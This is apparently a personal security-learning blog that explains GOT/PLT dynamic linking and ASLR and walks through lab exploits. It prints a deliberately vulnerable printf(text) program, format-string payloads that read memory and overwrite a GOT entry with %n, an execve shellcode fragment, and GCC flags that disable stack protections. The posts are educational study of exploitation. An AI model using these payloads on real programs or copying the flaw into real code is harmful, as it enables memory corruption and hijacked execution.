Security Development

How is glibc loaded at runtime?

I’ve been looking into address-space randomization. ASLR relies on randomizing the based address of things like shared libraries, making return-to-libc attacks more difficult. I understood the basics of ASLR but I still had a lot of questions. How are shared libraries, like libc, loaded at runtime? What is the global offset table? What is the procedure linkage table? What is a position independent executable? In this post, we’re going to look at all of these.

Back in the Day

In “the olden days” libraries used to be hard coded to be loaded at a fixed address in memory space. Runtime linkers had to deal with relocating conflicting hard coded addresses. Windows, to some extent, still does this.

PIC – Position Independent Code

Then came along Position Independent Code which simply means that the code (usually shared libraries) can be loaded at any address in memory-space and relocations are no longer a problem. In order to do that, binaries added sections for the GOT and the PLT.

Global Offset Table

Every ELF executable has a section called the Global Offset Table or the GOT for short. This table is responsible for holding the absolute addressof functions in shared libraries linked dynamically at runtime.

nobody@nobody:~$ objdump -R ./hello_world

./hello_world:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049564 R_386_GLOB_DAT    __gmon_start__
08049574 R_386_JUMP_SLOT   __gmon_start__
08049578 R_386_JUMP_SLOT   __libc_start_main
0804957c R_386_JUMP_SLOT   printf
Procedure Linkage Table

Just like the GOT, every ELF executable also has a section called the Procedure Linkage Table or PLT for short (not to be confused with BLT (Bacon Lettuce Tomato) ). If you’ve read disassembled code, you’ll often see function calls like ‘printf@plt,” that’s a call to the printf in the procedure linking table. The PLT is sort of like the spring board that allows us to resolve the absolute addresses of shared libraries at runtime.

nobody@nobody:~$ objdump -d -j .plt ./hello_world

./hello_world:     file format elf32-i386

Disassembly of section .plt:

08048270 <__gmon_start__@plt-0x10>:
 8048270:       ff 35 6c 95 04 08       pushl  0x804956c
 8048276:       ff 25 70 95 04 08       jmp    *0x8049570
 804827c:       00 00                   add    %al,(%eax)

08048280 <__gmon_start__@plt>:
 8048280:       ff 25 74 95 04 08       jmp    *0x8049574
 8048286:       68 00 00 00 00          push   $0x0
 804828b:       e9 e0 ff ff ff          jmp    8048270 <_init+0x18>

08048290 <__libc_start_main@plt>:
 8048290:       ff 25 78 95 04 08       jmp    *0x8049578
 8048296:       68 08 00 00 00          push   $0x8
 804829b:       e9 d0 ff ff ff          jmp    8048270 <_init+0x18>

080482a0 <printf@plt>:
 80482a0:       ff 25 7c 95 04 08       jmp    *0x804957c
 80482a6:       68 10 00 00 00          push   $0x10
 80482ab:       e9 c0 ff ff ff          jmp    8048270 <_init+0x18>
The GOT, The PLT, and the Linker

How do these all work together to load a shared library at runtime? Well it’s actually pretty cool. Lets walk through the first call to printf. Printf@plt, which is not really printf but a location in the PLT, is called and the first jump is executed.

080482a0 <printf@plt>:
 80482a0:       ff 25 7c 95 04 08       jmp    *0x804957c
 80482a6:       68 10 00 00 00          push   $0x10
 80482ab:       e9 c0 ff ff ff          jmp    8048270 <_init+0x18>

Notice that this jump is a pointer to an address. We’re going to jump to the address pointed to by this address. The 0x804957c is an address in the GOT. The GOT will eventually hold the absolute address call to printf, however, on the very first call the address will point back to the instruction after the jump in the PLT – 0x80482a6. We can see this below by looking at the output of the GOT. Essentially we’ll execute all of the instructions of the printf@plt the very first call.

(gdb) x/8x 0x804957c-20
0x8049568 <_GLOBAL_OFFSET_TABLE_>:      0x0804949c      0xb80016e0      0xb7ff92f0      0x08048286
0x8049578 <_GLOBAL_OFFSET_TABLE_+16>:   0xb7eafde0      0x080482a6      0x00000000      0x00000000

In the PLT code, an offset is pushed onto the stack and another jmp is executed

080482a0 <printf@plt>:
 80482a0:       ff 25 7c 95 04 08       jmp    *0x804957c
 80482a6:       68 10 00 00 00          push   $0x10
 80482ab:       e9 c0 ff ff ff          jmp    8048270 <_init+0x18>

This jump is a jump into the eventual runtime linker code that will load the shared library which contains printf. The offset, $0×10, that was pushed onto the stack tells the linker code the offset of the symbol in the relocation table (see objdump -R ./hello_world output above), printf in this case. The linker will then write the address of printf into the GOT at 0x804957c. We can see this if we look at the GOT after the library has been loaded.

(gdb) x/8x 0x804957c-20
0x8049568 <_GLOBAL_OFFSET_TABLE_>:      0x0804949c      0xb80016e0      0xb7ff92f0      0x08048286
0x8049578 <_GLOBAL_OFFSET_TABLE_+16>:   0xb7eafde0      0xb7edf620      0x00000000      0x00000000

Notice that the previous address, 0x80482a6, has been replaced by the linker with 0xb7edf620. To confirm that this indeed is the address for printf, we can start a disassemble at this address

(gdb) disassemble 0xb7edf620
Dump of assembler code for function printf:
...

Since the library is now loaded and the GOT has been overwritten with the absolute address to printf, subsequent calls to the function printf@plt will jump directly to the address of printf!

All of this also has the added benefit that a shared library is not loaded until a function in it’s library is loaded — in other words, a nice form of “lazy-loading!”

Learning about malware analysis

Like my previous post on wanting to learn more about rootkits, I’d love to learn more about malware analysis. How do antivirus companies reverse engineer malware that they find? How does the FBI get clues to the original of malware? I’m sure there is tons of stuff online to read but I’m also going to check out this book (so much to learn!)

Malware Forensics: Investigating and Analyzing Malicious Code covers the emerging and evolving field of “live forensics,” where investigators examine a computer system to collect and preserve critical live data that may be lost if the system is shut down. Unlike other forensic texts that discuss “live forensics” on a particular operating system, or in a generic context, this book emphasizes a live forensics and evidence collection methodology on both Windows and Linux operating systems in the context of identifying and capturing malicious code and evidence of its effect on the compromised system.
Malware Forensics: Investigating and Analyzing Malicious Code also devotes extensive coverage of the burgeoning forensic field of physical and process memory analysis on both Windows and Linux platforms. This book provides clear and concise guidance as to how to forensically capture and examine physical and process memory as a key investigative step in malicious code forensics.
Prior to this book, competing texts have described malicious code, accounted for its evolutionary history, and in some instances, dedicated a mere chapter or two to analyzing malicious code. Conversely, Malware Forensics: Investigating and Analyzing Malicious Code emphasizes the practical “how-to” aspect of malicious code investigation, giving deep coverage on the tools and techniques of conducting runtime behavioral malware analysis (such as file, registry, network and port monitoring) and static code analysis (such as file identification and profiling, strings discovery, armoring/packing detection, disassembling, debugging), and more.

* Winner of Best Book Bejtlich read in 2008!
* http://taosecurity.blogspot.com/2008/12/best-book-bejtlich-read-in-2008.html
* Authors have investigated and prosecuted federal malware cases, which allows them to provide unparalleled insight to the reader.
* First book to detail how to perform “live forensic” techniques on malicous code.
* In addition to the technical topics discussed, this book also offers critical legal considerations addressing the legal ramifications and requirements governing the subject matter

I’d love to get my hands on some of these binaries and dive in. If anyone happens to have any of these to analyze, please contact me!
Stuxnet
Zues Bot

 

ASLR, Dynamic Linkers, & Mmap

Well I had hoped to learn more about Address Space Layout Randomization (ASLR) and blog about it after reading “On the Effectiveness of Address-Space Layout Randomization.” I got about a quarter of the way through the paper and realized that I need to better understand address space layout in general. Where is libc in memory and how do programs get access to it?

I’ve been Googling and reading for the last 3.5 hours and am somewhat more informed but I’m still trying to figure it all out.

Every ELF executable on Linux invokes the dynamic linker ld-linux.so which is the bootstrap for finding and loading all other shared libraries (.so extensions). I think that the linker uses mmap() to memory map the shared libraries from the disk into virtual address space but I’m still somewhat confused on this part.

Mmap was another thing I wasn’t familiar with. Memory mapped files essentially allow a program to refer to a file as if it were in memory by paging in page sized chunks into memory. For writing files, it has the advantage that many small writes will happen to memory and then the virtual memory manager will write the page all at once to disk. I’m still trying to figure out what the advantage of mmap’ing shared libraries is. For shared libraries, mmap is used to map the shared library into the processes address space as if the process contained library in it’s memory. According to what I read, mmap can be used to map “shared memory objects” as well as files, etc. Basically anything that has a file descriptor can be memory mapped.

I’m wondering if the operating system loads very common and essential libraries like glibc into physical memory and then mmap’s them to the processes virtual address space or if it memory maps the actual file on disk like I mentioned above (i.e. /usr/lib/libc.so)

So far the best material I’ve found related to these subjects was

http://man7.org/linux/man-pages/man8/ld-linux.so.8.html

http://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html

http://msdn.microsoft.com/en-us/library/dd997372.aspx

http://en.wikipedia.org/wiki/Memory-mapped_file

and one that looks good but I haven’t had a chance to read yet this one is especially good:

http://www.symantec.com/connect/articles/dynamic-linking-linux-and-windows-part-one

Format String Vulnerabilities:Part 2

In part one of Format String Vulnerabilities I showed you some simple code with a very serious format string vulnerability. I showed you how you could exploit this vulnerability to read any part of memory. In section two, I’m going to show you how you can write to any address in memory!

Writing to Memory

Exploiting format string vulnerabilities is all about providing input that uses a format character that expects its value to be passed by reference and you control that reference. I used ‘%s’ to read from memory. I’m going to use %n to write to memory.

%n	      Number of characters written by this printf.

Lucky for us, there is a really easy way to control the number of characters written by printf. When you specify a format character, you can optionally give it an integer for the width of the format character.

%#x	      Number of characters prepended as padding.

We can use this to control how many characters are written by printf.

If you’re following at this point, you’re probably wondering how we’re going to use %n to write to memory. We can use %n to write the integer value of our 4 byte target address one byte at a time.

We can write the lower order bits and shift the target address by a byte, utilizing width padding characters to control the integer value we write to a given byte.

Target = 0xAAAA1111
0xAAAA1111 = <int>
0xAAAA1112 = <int>
0xAAAA1113 = <int>
0xAAAA1114 = <int>

If we can overwrite an address, we can control the flow of execution. Let’s overwrite the address of printf! First we need to find the address for printf

nobody@nobody:~$ objdump -R ./text_to_print
...
08049660 R_386_JUMP_SLOT   printf
...

Next we need to craft a string to overwrite this address using %n and width padding. We’ll also use printf’s ability to argument swap:

One can also specify explicitly which argument is taken
by writing '%m$' instead of '%'

Lastly, instead of writing a byte at a time, we can use printf’s ‘length modifier’ to tell printf what type it’s writing %n too. We’ll use ‘l’ (ell) for long unsigned int.

0x0000beef seems like a good address to overwrite printf with since everyone loves beef! Our input will be a 4 byte address (to printf) and the decimal value of beef – 4 (to accommodate the length of the address) = 48875.

Here’s what It looks like when we run it (note we have to escape the $ with a for the shell):

nobody@nobody:~$ ./text_to_print $(python -c 'print "x60x96x04x08"')%48875x%4$ln

Program received signal SIGSEGV, Segmentation fault.
0x0000beef in ?? ()

You can see that the program tried to jump to 0x0000beef and crashed! Be sure to check out the full section on format string vulnerabilities inHacking: The Art of Exploitation, it talks all about these techniques and more.

Format String Vulnerabilities:Part 1

I have to admit that I’ve heard of format string vulnerabilities but I never knew exactly what they were. After reading about them in Hacking: The Art of Exploitation I’m surprised I didn’t know more about them since they are extremely dangerous! Take this code for instance:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
   char text[1024];

   if(argc < 2) {
      printf("Usage: <text to print>n", argv[0]);
      exit(0);
   }
   strncpy(text, argv[1], 1024);
   printf(text);

   printf("n");

   return EXIT_SUCCESS;
}

Normal usage would look like this:

nobody@nobody:~$ ./text_to_print "Hello World!"
Hello World!

Looks harmless right? It’s not! This code is very vulnerable to a format string vulnerability. The problem is, the call to printf, should have been:

 printf("%s", text);

Why does it matter? Well the way that printf works is that all of the variable arguments for the format strings are passed in reverse order onto the stack. Printf then parses the input until it reaches a format character and references the argument on the stack based on the index of the format character.

If we specially craft the input to take format characters, printf will mistakenly reference previous elements on stack. We can use this to effectively read the stack. For instance

nobody@nobody:~$ ./text_to_print "AAAA %x %x %x %x"
AAAA bffff9ba 3f0 0 41414141

It gets better though! The previous stack frame before printf is called contains the string argument passed to printf. Did you notice in the output above, the last ‘%x’ printed the first ‘AAAA’?

We can use this to read the contents of any memory address by putting the address we want to read at the first of the string, followed by 3 stack positions (8 bytes each), and then putting a ‘%s’ format character at the 4th position to read our address. Like this (the ‘+’ is used to separate for readability)

nobody@nobody:~$ ./text_to_print $(printf "x34xf8xffxbf")%08x%08x%08x%s
4���bffff9b5+000003eb+00000000+

or with Python like this

nobody@nobody:~$ ./text_to_print $(printf "x34xf8xffxbf")$(python -c 'print "%08x+"*3')%s
4���bffff9b5+000003eb+00000000+

00000000 is the contents of address xbffff834!

More to come on using format string vulnerabilities to write to any place in memory in Part Two of Format String Vulnerabilities!

Flow of a Buffer Overflow Payload

Here is the flow of a buffer overflow payload with a NOP Sled.

  1. Jump to overwritten return address that (hopefully) points to somewhere in the NOPs (0×90)
  2. Consume the No Operations (NOPs)
  3. Execute the shell code

 

Trouble Spawning a Shell

I’ve been working on some of the examples out of the Hacking: The Art of Exploitation book which exploit a program with shellcode but I’m not having much luck. The exploit makes sense conceptually but I can’t get it to spawn the shellcode.

It uses the system() function to invoke the exploitable program from the shell with the payload as a commandline arg. I want to look at the stack in GDB of the command being invoked by the system() function … does anyone know how to do this or know if it’s even possible?

It’s possible for me to look at the stack when I pass the arguments myself from the commandline but the system() function is doing it instead cause it’s easier to construct the shellcode programmatically.

I also looked at the return value of the system() function and it’s zero meaning that the program exited normally. I’m curious if the somehow the command payload isn’t getting passed correctly so I was hoping to look at the stack…

Update
My problems were related to trying to execute the exploit on a 64-bit system when the code was developed for 32-bit. After switching over to a 32-bit OS, I was able to spawn a shell no problem!

32 bit vs 64 bit exploitation

The exploit code in Hacking: The Art of Exploitation is targeted towards overwriting 32 bit return addresses (size 4). It uses code like this:

unsigned int ret;
ret = &var;
*((unsigned int *)(buffer+sizeof(unsigned int))) = ret;

I’m working on a 64 bit machine and thus my addresses are double in size. I’m guessing this means that the above code won’t work on my machine (I’m not sure?). I searched around and found an “unsigned integer pointer type” which is defined per architecture and it is indeed size 8 on my 64 bit machine. I changed the code to this:

uintptr_t ret;
ret = &var;
*((uintptr_t *)(buffer+sizeof(uintptr_t)) = ret;

I thought that this was the reason I was having trouble spawning a shell from shellcode but after changing the code it still doesn’t spawn a shell.

Update
Not only do I think the return addresses are going to be different between 64 bit and 32 bit but they’ve totally changed the syscall numbers in “unistd.h”. That means that this shellcode isn’t going to work at all on 64-bit because it assumes ‘execve’ is 11.

; execve(const char *filename, char *const argv [], char *const envp[])
  push BYTE 11      ; push 11 to the stack
  pop eax           ; pop dword of 11 into eax
  ....
  int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

On 64 bit, 11 is ‘munmap’

#define __NR_munmap                             11

Looks like I’ll definitely be installing a 32 bit version of Linux in order to follow along with the examples, 64 bit is going to be too challenging while I’m in the learning stage.

Quickly Use BC to Convert Hex to Dec

This post is mainly for my own benefit because I’ll forget this if I don’t put it down somewhere. A lot of the times I need to convert hex to dec when I’m on the command line and it’s a pain to open up the calculator so here is the command line equivalent

echo "ibase=16; FFFF" | bc

Turning off buffer overflow protections in GCC

As I’m learning more and more about exploiting buffer overflows I’m realizing that it’s actually pretty hard to run the examples that teach you how to exploit buffer overflows. GCC (and other compilers) have built in support for mitigating the simple buffer overflows and it’s turned on by default.

With GCC you have to compile with the -fno-stack-protector option otherwise you get “***stack smashing detected***,” this is pretty well known and documented all over the net.

However, additionally you’ll need to disable the FORTIFY_SOURCE option otherwise you’ll get “Abort trap” if you try to do a buffer overflow that uses something like strcpy or memcpy.

To disable it, simply compile with the flag -D_FORTIFY_SOURCE=0 (e.g. gcc -g -fno-stack-protector -D_FORTIFY_SOURCE=0 -o overflow_example overflow_example.c)

FORTIFY_SOURCE is enabled by default on a lot of Unix like OSes today. It’s original development dates back almost 6 years ago but I don’t think it was turned on by default until recently (within the past 2 years)

#  else
#    define _FORTIFY_SOURCE 2	/* on by default */
#  endif

That means that when you include something like “string.h”, at the bottom of “string.h” is the following (at least on Mac OS X 10.6):

...
#if defined (__GNUC__) && _FORTIFY_SOURCE > 0 && !defined (__cplusplus)
/* Security checking functions.  */
#include <secure/_string.h>
#endif

So when you compile, instead of seeing a call to strcpy

0x0000000100000d50 <main+188>:  lea    rdi,[rbp-0x20]
0x0000000100000d54 <main+192>:  call   0x100000dba <dyld_stub_strcpy>
0x0000000100000d59 <main+197>:  lea    rdx,[rbp-0x20]

you’ll see a call to the strcpy_chk function in your disassembled code

0x0000000100000d50 <main+192>:  mov    edx,0x8
0x0000000100000d55 <main+197>:  call   0x100000daa <dyld_stub___strcpy_chk>
0x0000000100000d5a <main+202>:  lea    rdx,[rbp-0x20]

This will wreck havoc on any of your simple buffer overflow exploiting examples so make sure you disable it when you compile. Happy exploiting!

Go to Top